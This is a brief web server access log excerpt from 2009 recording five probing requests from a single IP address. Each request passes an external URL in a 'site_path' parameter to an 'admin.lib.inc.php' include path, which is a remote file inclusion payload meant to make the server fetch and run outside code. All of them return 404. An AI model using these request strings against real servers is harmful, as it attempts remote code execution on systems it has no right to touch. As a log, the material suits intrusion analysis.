219.85.63.226 - - [20/Jul/2009:01:36:00 -0400] "GET /logs/access_log.Q109070800//include/admin.lib.inc.php?site_path=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:01:36:01 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:01:36:01 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:01:36:01 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:01:36:01 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
